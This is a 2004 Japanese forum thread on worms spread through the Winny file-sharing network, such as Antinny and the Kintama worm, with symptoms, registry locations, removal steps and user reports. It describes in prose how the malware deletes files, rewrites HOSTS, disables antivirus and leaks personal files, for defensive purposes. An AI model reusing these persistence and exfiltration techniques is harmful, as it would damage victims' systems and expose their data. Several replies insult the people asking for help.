Winnyを狙ったワーム・ウイルス構造解析 Part31

このエントリーをはてなブックマークに追加
1[名無し]さん(bin+cue).rar
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」等)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part29
http://tmp4.2ch.net/test/read.cgi/download/1098962243/l50

テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
2[名無し]さん(bin+cue).rar:04/11/10 16:44:05 ID:pSqzF5/r
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
3[名無し]さん(bin+cue).rar:04/11/10 16:44:33 ID:pSqzF5/r
■推奨無視リスト
このままIgnore.txtにコピペしてください。

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。
4[名無し]さん(bin+cue).rar:04/11/10 16:44:46 ID:2xr6m8vR
            _ ∧,,∧     ∧_∧_
           | ミ;゚Д゚彡  (´∀` )|
  ∧_∧   |ミ,,O[]]]Cミ   (つ[]]]C)| ∧∧ _
 /( ・∀・)  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄' メ (゚∀゚*) |
 | ( つ[]]]C /        [[[][]] ◇    o[]]]]c ) |
 | ゝ_. ‐, {     []              } ,メ |
 || ̄ ̄||__)ゝ__________ノJl ̄||
           | l          l |
5[名無し]さん(bin+cue).rar:04/11/10 16:45:09 ID:eD1/Cf1O
、   l   _,             
  ヽ/⌒ヘ~          
  ., 't,_,ノ丶    /ヽ    /ヽ
 /  !   `  / ノ   / ノ
        /   '' ̄ ゙̄   \
        | ●  _       |    気持ちいい!!
        /    L_/  ●   |  /\ ちょ〜〜〜きもちいい〜〜〜
       'i  ○  l ,/    ○ |/.   \
        \     しii        |    /
      __ /       'ii    __ |  /
      | ヽ|         'ij  ./ | | /
     \,,,|           /  | | \
          |             |/
6[名無し]さん(bin+cue).rar:04/11/10 16:45:12 ID:pSqzF5/r
■感染しないための注意1 〜やっておくべき設定等〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・シングルクリックをダブルクリックにしてうっかり操作防止。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorun(自動実行)は切っておく。(やり方は以下参照)
・適切な無視リストの設定などで、そもそもウイルスを呼び込まない。(リストは以下参照)
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
 (フォルダ名と同じファイルは置けないのである程度防止になる)
・WhiterVBS簡易チェッカーを使う。
 ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
 (拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
 ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
・フォルダアイコン、txtアイコンを標準のものから変更しておく。
  (アイコンを偽装したexeを見分けるため。aviやヘルプなど他の拡張子も変更が望ましい)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。
7[名無し]さん(bin+cue).rar:04/11/10 16:45:45 ID:pSqzF5/r
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
 ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど中身を確認できるアーカイバを使う。
・lzh,zip,rarなど圧縮ファイルは解凍後も要注意。
・exeファイルの実行は完全自己責任。
・CDイメージ(CCD等)はautorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
 ttp://p46.aaacafe.ne.jp/~nydb/

CD/DVDドライブのAutorun(自動実行)の切り方
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※また窓の手などでソフトでも簡単にオフに出来る。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
8[名無し]さん(bin+cue).rar:04/11/10 16:46:26 ID:pSqzF5/r
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\xxx\xxx.exeが登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
・etc.(亜種により様々)
■活動内容(亜種毎に違います)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
 (例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
・今回に関わらず、落とした.exeファイルの実行は控える。
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html
★関係ウイルス【苺きんたま(Trojan.Upchan)】
ttp://www.geocities.jp/ichigo_kintama/
9[名無し]さん(bin+cue).rar:04/11/10 16:47:04 ID:pSqzF5/r
★流行種その2
【Antinny.ms(仮称)】
 Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
 ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
 (Systemフォルダにあるsvchost.exeは問題ありません)
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子はms???.exe(248k)。親はms???.exe(282k)
 (子を消しても、再起動すると親が子を再度作成する)
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■対策
1. 親のファイル名が含まれるレジストリキーを削除。
  Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
  (Win9X、MEの場合は不明)
2. セーフモードで再起動し、親子ともどもファイルを削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
  HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
  バスターはPCCTool.exeを使えば再インスコせずに済む。
10[名無し]さん(bin+cue).rar:04/11/10 16:47:38 ID:pSqzF5/r
★流行種その3
【Autorun+bat】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■活動内容(版により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
 (削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)起動をatコマンドでスケジュールする。
・壁紙のエロCGへの変更(画面のプロパティでの修正は不可)
■駆除方法(版により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
・exeの実行は自己責任で行う。あまりアンチウイルスソフトは役に立たない。
11[名無し]さん(bin+cue).rar:04/11/10 16:48:13 ID:pSqzF5/r
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染の模様。
■症状(感染確認方法)
・ny起動すると画面が真っ黒になり
 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャを起動できないようにする。(情報錯綜)
■活動内容
・C:\WINNT\Web\Wallpaperのフォルダが開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
 私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」ができてる。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe" 22,528Byteができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルを3つ?作る。
・そのexeファイル名はシステムに使用されるものをランダムに使用の模様。
 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下も追加、作用は不明?値はGalaxian Explosion
 HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■対策
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexe削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで怪しいキー削除。
12[名無し]さん(bin+cue).rar:04/11/10 16:49:22 ID:pSqzF5/r
★新種(詳しい解析求む)

・元祖仙台キンタマ(仙台ギャラクシーエンジェルズ)
  エロゲの「ホットギミックフォーエバー」「こんねこ」「グリグリ2」に
  それぞれ少しずつ違うタイプの実行ファイルとして混入
      →ノートン先生がW32.SillyP2Pとして対策済
  症状:壁紙を赤くする、ファイル詰合わせ放流、SS放流、ny関連のtxtから情報抽出して放流など
     時限発動でSS詰め合わせを(画像詰め合わせ)として放流かも?

・2次感染を狙ったもの(たぶん作者は仙台キンタマと同一)
  仙台キンタマが放流する詰合わせに偽装したもの
  (ユーザー名が2-3文字の女性名、トリップ無し)に
  混在の.scr(スクリーンセーバ偽装)
      →ノートン先生が Antinny.Gとして緊急対策済(次回定例更新時に反映)
   症状:HDD内から.doc .xls .txt .jpgを検索してすべてを収集し
      nyネットワークに放流する(恥ずかしい.jpg画像やメール送受信記録、Cookieなど)
13[名無し]さん(bin+cue).rar:04/11/10 16:50:12 ID:pSqzF5/r
過去スレ
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 http://tmp4.2ch.net/test/read.cgi/download/1099709559/
14[名無し]さん(bin+cue).rar:04/11/10 17:10:31 ID:yujnkI4Q
>>1
スレ立て乙
質問スレでない事が強調されていて
こっちのスレタイの方がいいと思う
15[名無し]さん(bin+cue).rar:04/11/10 17:11:32 ID:CygNdw/6
           ―──――――──―──―──
    _,.、、.、  |・構造解析しちゃっていいですかぁ
  _/ ̄ ̄ ̄ヽ.  ーv――──―──―──―──―
 ( ) ((o。〜。o) ii
 l ( ,=  ∴ |. |.|
 ト<.  : [(.-<,ゞ⌒.: 、 ヾ 「ヌ, ミ
| VTー、「TL、_( .:.)、,,/ _ノ
ヾ_/ lー| 〉ー( ̄(G-,ソY|
 /_/ ̄|_/l⌒Y,I7ー'‐''T'll
 'd′  bl´  'd    'd!
16[名無し]さん(bin+cue).rar:04/11/10 17:17:26 ID:xGQbkX08
スレ名いいと思うよ〜
>>1お疲れんこ
17[名無し]さん(bin+cue).rar:04/11/10 17:48:32 ID:nJAF0je6
http://tmp4.2ch.net/test/read.cgi/download/1099709559/939

漏れも、scr踏んだらおんなじパスができてた。
でも、レジストリとかの改変はなかったし、うpフォルダのなんともなかった。
18[名無し]さん(bin+cue).rar:04/11/10 18:33:25 ID:JnOxBOSN
Autorun.ini

[Autorun]
icon="ICON.ico"
open="Autorun.exe"
shell\menu01\=GreenGreen2のインストール
shell\menu01\command="Game\setup.exe"
shell\menu02\=DirectX8.1bのインストール
shell\menu02\command="DirectX\dx81bredist.exe"
shell\menu03\=DirectX9.0cのインストール
shell\menu03\command="DirectX\directx_9c_redist.exe"
19特攻野郎:04/11/10 18:41:17 ID:AL8YDYAD
再陰スコして、からっぽの特攻準備できたので逝ってくる
20[名無し]さん(bin+cue).rar:04/11/10 19:28:06 ID:rsckxfCM
WINCDR 8.0 には手を出すな。Cドライブにあるファイルが全部消える。
21[名無し]さん(bin+cue).rar:04/11/10 19:38:28 ID:kgelEZKi
なんでわかったんですか?
22[名無し]さん(bin+cue).rar:04/11/10 20:00:59 ID:/wnYY3sT
1.手を出してファイルが全部消えたから
2.ウイルスを仕込んだ張本人だから
23[名無し]さん(bin+cue).rar:04/11/10 22:03:04 ID:4fpzBGYZ
scr.踏んで無症状だったけど、精神衛生上よくないので
再セットアップして復活! nyはもうやらない(たぶん)
24[名無し]さん(bin+cue).rar:04/11/10 23:01:54 ID:mLV78p8d
日記は日記へ
25[名無し]さん(bin+cue).rar:04/11/10 23:13:05 ID:J1ZIPsMD
「たぶん」という一語に、現代人特有の優柔不断さが計り知れますね
26[名無し]さん(bin+cue).rar:04/11/10 23:14:51 ID:FDRW/guP
プロファイリング
27[名無し]さん(bin+cue).rar:04/11/10 23:18:18 ID:kgelEZKi
「たぶん」という一語に、「またやっちゃってここに来るかも
しれないけどやさしくしてね」という甘えの構造が見受けられ
ますね。
28[名無し]さん(bin+cue).rar:04/11/10 23:41:54 ID:Ai/NAuDt
600 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/11/03 23:37:08 ID:veP/UxsT
女っぽい名前のファイル詰め合わせは釣りの予感がする。
jpgが流れていないのに、どうして詰め合わせが流れるんだろう?

前々スレで漏れのカキコなんだけど、すごいと思わない?
29[名無し]さん(bin+cue).rar:04/11/10 23:46:52 ID:xqV2QDce
すごいと思うから前スレ埋めてくれや
30[名無し]さん(bin+cue).rar:04/11/11 01:54:37 ID:gG6HOJqi
>>28
m9(^Д^)プギャーッ
31[名無し]さん(bin+cue).rar:04/11/11 02:14:39 ID:mAgVWPOH
>>1



でもニュイルスじゃないよママン orz
32[名無し]さん(bin+cue).rar:04/11/11 10:47:38 ID:yXRTcJcS
>>28
常識人なら爆弾だと思うよ
33[名無し]さん(bin+cue).rar:04/11/11 11:05:08 ID:k7aRSyV9
タスクマネージャが起動できません。
nyで落としたファイル名「偽装解除」と書かれたMS-DOSへのショートカットファイルをダブルクリックしてから
壁紙が勝手に変わったり変な音声が流れたりします。
ウイルススキャンしましたが反応しませんでした。
タスクマネージャーを使えるようにできないでしょうか?
34[名無し]さん(bin+cue).rar:04/11/11 11:07:38 ID:yXRTcJcS
>>33
質問スレじゃねーんだ。テンプレ読んで消えろ
35[名無し]さん(bin+cue).rar:04/11/11 11:07:49 ID:HMzg0JF1
質問させていただきます。
OS:WinXP SP1 
Antinnyに感染したっぽかったので、テンプレを参考に削除を行いました。
そのあと、ノートンのアップデートを昨日して、スキャンしましたが、感染は0でした。

しかし、何もせずPCを放置していると3〜5分おきぐらいにマウスカーソルが
一瞬砂時計になるのが、見えました。
気になったので、タスクマネージャーでネットワークの欄を見ていたら、砂時計と
同時にグラフが変化しました。
まだ、感染しているのでしょうか?
また、Winnyを起動していなくても何らかのファイルを落とされるのでしょうか?
初歩的なことですみませんが、お願いします
36[名無し]さん(bin+cue).rar:04/11/11 11:09:49 ID:AH9gEfAB
>しかし、何もせずPCを放置していると3〜5分おきぐらいにマウスカーソルが一瞬砂時計になるのが、見えました。
感染する前はなってなかったのか?
37[名無し]さん(bin+cue).rar:04/11/11 11:09:54 ID:2JwuzuEf
まぁなんだ…

自分でTCP/IPの確認できないやつはWinnyするな!!!!
38[名無し]さん(bin+cue).rar:04/11/11 11:10:18 ID:gjdT+BPZ
>>35
せっかくテンプレ嫁って誘導してやったのに
流し読みか?「熟読」しろって言ってんだよ
3935:04/11/11 11:20:32 ID:HMzg0JF1
>>36
なってなかったと思います。

補足で
Upフォルダが作成されていたのでフォルダとUpFolder.txtを削除。
ProgramFiles内に怪しいexeがあったので削除。
 (XPTurboを入れているのですが、その実行ファイル+eeeとかなっていた。)
Win.ini?だったかな? その中にぬるぽとあったので2行を削除。
テンプレのサイトを参考にレジストリの再登録。
DLフォルダ内のファイル、キャッシュも削除。
などおこなった後にスキャンしました。

ノートンは常時起動中です。
LANを抜いても3〜5分置きに砂時計になります。
また、感染を確認した後にノートンをいれました。
40[名無し]さん(bin+cue).rar:04/11/11 11:22:37 ID:yXRTcJcS
能登先生は働き者だから
メモリ喰いすぎでアンインストールしたくなることもしばしば

というか35よお前は馬鹿か?
41[名無し]さん(bin+cue).rar:04/11/11 11:25:13 ID:LWaaUmF/
質問の振りして釣ってるだけだろ
42[名無し]さん(bin+cue).rar:04/11/11 11:26:14 ID:V1mPaUbF
>>18
元祖仙台キンタマ入りのグリグリ2のAutorun.iniか?
43[名無し]さん(bin+cue).rar:04/11/11 11:26:24 ID:uKIb2Tnt
グリグリ2とこんねこを数個落としてVirtual PCで起動&OLLYDBGでデバッグ
してみたがそれっぽいのは見つからんかったよ
44[名無し]さん(bin+cue).rar:04/11/11 11:34:06 ID:2JwuzuEf
>>43
了解 こんねこで試してみる
どうなったかはここに書く
45[名無し]さん(bin+cue).rar:04/11/11 11:44:46 ID:d/Vjpawa
なんかタスクマネージャ見ると
svchost.exeが6つも立ち上がってるんだけど
マズイ?
46[名無し]さん(bin+cue).rar:04/11/11 11:52:49 ID:pDXzM/rA
6つは多いな。最高でも5つだった。
47[名無し]さん(bin+cue).rar:04/11/11 12:04:48 ID:7M5fcs6n
俺7個
48[名無し]さん(bin+cue).rar:04/11/11 12:22:14 ID:0D+x1/8V

次は仙台詰め合わせ偽装の亜種が来るだろうねw
49[名無し]さん(bin+cue).rar:04/11/11 12:26:18 ID:NZ9L6KkC
>また、感染を確認した後にノートンをいれました。

ハライテー
50[名無し]さん(bin+cue).rar:04/11/11 12:41:19 ID:aBPgITjE
落とした詰め合わせにIDとPASSがあったからって
ログインするなよ。

使われたのが発覚して被害届けが出ればnyとは全く関係ないところで不正アクセスで捕まるよ。
51[名無し]さん(bin+cue).rar:04/11/11 12:46:08 ID:9fsbScht
そういや仙台はどうやってクラックしてうp0にしてるnyからうできてんの?
52[名無し]さん(bin+cue).rar:04/11/11 12:47:05 ID:9fsbScht
>>50
誤爆?
53[名無し]さん(bin+cue).rar:04/11/11 12:50:56 ID:zQEznTTf
scrなんてexe並に危険なのに何で踏むやついるんだろう。
それともスクリーンセーバー集めるのが流行ってるの?
54[名無し]さん(bin+cue).rar:04/11/11 13:55:58 ID:Pf3EnGzr
一瞬見るとフォルダアイコンに名前だけだから、つい条件反射で開こうとしてしまう。
scr拡張子も長い空白のあとにあって気づきにくい。
55[名無し]さん(bin+cue).rar:04/11/11 14:16:39 ID:z0hBKeNy
>自分でTCP/IPの確認
何それ?釣り?(プケラ
56[名無し]さん(bin+cue).rar:04/11/11 14:17:37 ID:z0hBKeNy
>>37
お前、よくも知らずにTCP/IPを口にしてるだろw
57[名無し]さん(bin+cue).rar:04/11/11 14:17:45 ID:AfiH6QbY
1000 名前:[名無し]さん(bin+cue).rar 本日のレス 投稿日:04/11/11 11:05:43 LWaaUmF/
1000なら新ウィルスくるー
58[名無し]さん(bin+cue).rar:04/11/11 14:20:24 ID:0mGnaQnp
総合質問で聞いたんですが、
こっちで聞いた方がいいかもしれないという事で質問させていただきます

怪しいexeファイルを実行した覚えはないのに
トレンドマイクロのオンラインスキャンで
C:\RESTORE\TEMP\A0001607.CPYがWORM ANTINNY Aに感染
と表示されました。

ですが「c:\windows\win.ini」をあけても「ぬるぽ」が見当たりません。
また"UpFolder.txt" と「Up」というフォルダも生成されません。
何か亜種に掛かったのでしょうか? 再イントールが懸命ですか?

OSはME
WindowsUpdateは最新です。
Winnyのバージョンは2.71
スタートアップメニューから上に書いてあるファイルを検索して
削除しようとしましたがファイルが見つからず断念しました。
今nyは作動させてません
59[名無し]さん(bin+cue).rar:04/11/11 14:26:07 ID:xbB0iQHr
とりあえずWinMEを燃やせ
60[名無し]さん(bin+cue).rar:04/11/11 14:27:21 ID:mAgVWPOH
>>58
それは>>1を読んだ上での狼藉か?
61[名無し]さん(bin+cue).rar:04/11/11 14:28:03 ID:z0hBKeNy
アンティニーなら必ず、レジストリに自動起動する設定が作られているはずだ。
62[名無し]さん(bin+cue).rar:04/11/11 15:40:17 ID:W7cPKUzn
フォルダを条件反射で開いてしまう人は
フォルダのアイコン等々変えておいた方が無難だ。
63[名無し]さん(bin+cue).rar:04/11/11 15:46:40 ID:1oWIZ+yT
XPSP2なら警告出るんだけどな。
それかSSMをインスコ。
64[名無し]さん(bin+cue).rar:04/11/11 16:28:40 ID:/9qbmrha
つーか、
Downフォルダにサブフォルダを作るな!
Explorerは常に詳細表示にしる!
65[名無し]さん(bin+cue).rar:04/11/11 16:34:03 ID:6w6fLCsX
>>64
なんでDownフォルダにサブフォルダ作ったらいけないの?
66[名無し]さん(bin+cue).rar:04/11/11 16:36:45 ID:prQSigAL
やっと規制解除だよ、やれやれ

>>17、前スレ>939
.scrについては研究中(つーほど、何もやっていないが…)なのだが

挙動がいろいろあって、system32\networkへのpathができるだけ(俺の環境ではこれも起きない)
というのと、いや、.txt.doc等を収集するってのと、いやいやny放流もする
という報告もあって、よく分からんのが実情なのよ。ちなみに先生は Antinny.G として識別する

[私には/私は…]シリーズの元がコレかも、とは思っているんだが、.scr単体には
[私には好きな人がいます]とかの文字列は、どこをどうやっても発見できないし。
(アーカイブの伸張関連コードはたくさん埋まってるんだけどね、3DESとかもあったり)
あと、Project1.exe なんて文字列が埋まってるんだが…コレも詳細不明。

* wingoというディレクトリができるとか言う情報もあったが、それは たぶん Beagle.AV@mm
ttp://www.symantec.co.jp/region/jp/avcenter/venc/data/[email protected]
(今回の.scrモノとは、明らかに別物)

文字コードを暗号化してコーディングしてるのなら、かなり高度なプログラム技術を持ってる
香具師の仕業なので、元祖仙台との関連性を疑うのも納得できる。んだが、
元祖仙台の出現後、3日後には[私には…]が出現してることを思うと、あまりに短期間過ぎる
ということで、>>12の簡単なまとめでは、元祖仙台は餌→.scrが主 という主張をしてみたんだが

へたれな俺の手にはあまる代物なのかも知れない
67[名無し]さん(bin+cue).rar:04/11/11 16:41:30 ID:prQSigAL
追記、
元祖の仙台ギャラクシーは、VBで書かれてる
で、.scrとは言語が違うという話があったが、.scr内に埋もれてるProject1.exeは
VBでコンパイルしたときのデフォ名だったりする。→少なくとも何らかの関連性はあるのでは?
68[名無し]さん(bin+cue).rar:04/11/11 16:54:37 ID:QElx3v70
DelphiでもProject1.exeはデフォルトだ
デフォルトがProject1.exeは多い
69[名無し]さん(bin+cue).rar:04/11/11 17:21:32 ID:b5RCCLg5
正直言って、馬鹿しか引っかからないウィルスよりは、
コマンドプロンプトからじゃないと消せないフォルダの方がメンドクサイ。
70[名無し]さん(bin+cue).rar:04/11/11 17:41:56 ID:fe7Q6b5+
scr踏んだけど
Port0だから大丈夫だと思ってる椰子は多分out
ny起動してないから大丈夫だと思ってる椰子も多分out
の悪寒。     
71[名無し]さん(bin+cue).rar:04/11/11 18:11:45 ID:M3EyKv+f
今日はぞろ目の日


>>70
そんな考え持ってるやつは
ネットに繋がないほうがみんなの為だな
72[名無し]さん(bin+cue).rar:04/11/11 18:57:00 ID:wcqQqKS5
ねぇねぇ、何で「ウィルス感染した」と確信したのに
再インストールすら出来ない(個人の技量orPCの事情)でWINNYとか起動すんの?
真性の池沼?
73[名無し]さん(bin+cue).rar:04/11/11 18:59:45 ID:mAgVWPOH
>>72
バカしか引っかからないワームに引っかかってる訳だからな
真のバカって事なんじゃね?
74[名無し]さん(bin+cue).rar:04/11/11 19:45:10 ID:cTrygF5Y
ああ、今日ってポッキーの日だな
75[名無し]さん(bin+cue).rar:04/11/11 20:44:57 ID:UNIX0FJe
毎日がボッキの日です
76[名無し]さん(bin+cue).rar:04/11/11 20:45:22 ID:KAGEsqwZ
いや、電池の日だろ。
77[名無し]さん(bin+cue).rar:04/11/11 21:05:38 ID:prQSigAL
靴下の日でもある。
78[名無し]さん(bin+cue).rar:04/11/11 21:10:11 ID:T+HuU4jZ
トマトプリッツでも買ってくるか。
79[名無し]さん(bin+cue).rar:04/11/11 21:41:28 ID:mAgVWPOH
今日は何の日っておまいら揃ってみのもんたかYO
80[名無し]さん(bin+cue).rar:04/11/11 21:56:18 ID:yXRTcJcS
Welcome!
    ■   ■    ■    ■  ∧_∧       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ■   ■■  ■■  ■ |\´ー`)/|  < 今日はサッカーの日
